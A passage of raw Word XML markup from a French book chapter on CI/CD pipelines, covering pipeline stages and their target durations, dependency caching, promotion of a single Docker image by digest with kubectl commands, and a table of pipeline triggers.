        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Chaque étape doit réduire un risque identifiable. Une étape qui ne peut jamais échouer est une étape décorative : elle donne une fausse assurance.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:keepLines/>
        <w:spacing w:before="120" w:after="0" w:line="20" w:lineRule="exact"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5580000" cy="3556000"/>
            <wp:docPr id="90" name="Picture 90"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="c00_f88.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId128"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5580000" cy="3556000"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Figure 0.88 — Du commit à la production</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.295 — Sept étapes et leurs cibles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57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Étape</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="329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Risque couvert</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="214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Durée cible</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3577"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Format et lint</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3291"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Incohérence de style</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2146"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>&lt; 1 min</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3577"/>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Compilation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="32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Erreur de syntaxe</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="214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&lt; 2 min</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3577"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Tests unitaires</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3291"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Régression logique</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2146"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>&lt; 3 min</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3577"/>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Tests d'intégration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="32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Incompatibilité entre composants</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="214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&lt; 10 min</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3577"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Construction d'image</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3291"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Artefact non reproductible</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2146"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>&lt; 5 min</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3577"/>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Analyse de vulnérabilités</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="32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Dépendance dangereuse</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="214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&lt; 3 min</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3577"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Déploiement</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3291"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Configuration invalide</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2146"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>&lt; 5 min</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ÉCHOUER VITE</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="100" w:line="316" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Un pipeline de dix minutes dont la première minute détecte 80 % des erreurs vaut mieux qu'un pipeline de trois minutes qui échoue à la fin. Placez les contrôles rapides en premier.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Deux optimisations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Cache des dépendances : gain typique de 30 à 60 s par exécution</w:t>
        <w:br/>
        <w:t>cache:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  key:</w:t>
        <w:br/>
        <w:t xml:space="preserve">    files: [package-lock.json]</w:t>
        <w:br/>
        <w:t xml:space="preserve">  paths:</w:t>
        <w:br/>
        <w:t xml:space="preserve">    - node_modules/</w:t>
        <w:br/>
        <w:br/>
        <w:t># Parallélisation des tests indépendants</w:t>
        <w:br/>
        <w:t>test:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  parallel: 4</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>78.3 Artefact unique</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Construire une fois, promouvoir partout. Reconstruire pour chaque environnement annule la garantie que l'artefact testé est celui déployé.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:keepLines/>
        <w:spacing w:before="120" w:after="0" w:line="20" w:lineRule="exact"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5580000" cy="2667000"/>
            <wp:docPr id="91" name="Picture 91"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="c00_f89.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId129"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5580000" cy="2667000"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Figure 0.89 — Deux approches de promotion</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Une promotion par empreinte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Le même digest traverse les environnements</w:t>
        <w:br/>
        <w:t>docker build -t registry.exemple.fr/app:1.4.2 .</w:t>
        <w:br/>
        <w:t>docker push registry.exemple.fr/app:1.4.2</w:t>
        <w:br/>
        <w:t>DIGEST=$(docker inspect --format '{{index .RepoDigests 0}}' app:1.4.2)</w:t>
        <w:br/>
        <w:br/>
        <w:t># Recette</w:t>
        <w:br/>
        <w:t>kubectl set image deployment/app app=$DIGEST -n recette</w:t>
        <w:br/>
        <w:t>kubectl rollout status deployment/app -n recette</w:t>
        <w:br/>
        <w:br/>
        <w:t># Production : exactement le même digest</w:t>
        <w:br/>
        <w:t>kubectl set image deployment/app app=$DIGEST -n production</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EMPREINTE (DIGEST)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="100" w:line="316" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Identifiant de contenu immuable. Promouvoir par empreinte garantit que l'image testée est exactement celle qui sera exécutée.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Deux vérifications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Vérifier ce qui tourne réellement</w:t>
        <w:br/>
        <w:t>kubectl get deployment app -n production \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  -o jsonpath='{.spec.template.spec.containers[0].image}'</w:t>
        <w:br/>
        <w:br/>
        <w:t># Vérifier la correspondance avec la version annoncée</w:t>
        <w:br/>
        <w:t>kubectl get pods -n production -o</w:t>
        <w:br/>
        <w:t xml:space="preserve">  jsonpath='{.items[*].status.containerStatuses[*].imageID}'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>78.4 Déclencheurs</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Un pipeline se déclenche sur des événements. Le choix des déclencheurs détermine le coût et la pertinence des vérifications.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.296 — Cinq déclencheurs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57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Déclencheur</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="33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c>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="212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Coût</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3579"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Chaque commit sur une branche</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3314"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Vérification rapide</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2121"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Élevé</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="357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Demande de fusion</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="33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Vérification complète</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="212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Moyen</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3579"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Fusion sur </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>main</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3314"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Construction et publication</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2121"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Faible</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="357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Étiquette de version</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="33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Publication officielle</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="212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Très faible</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3579"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Planification</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3314"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Analyse de sécurité</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2121"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
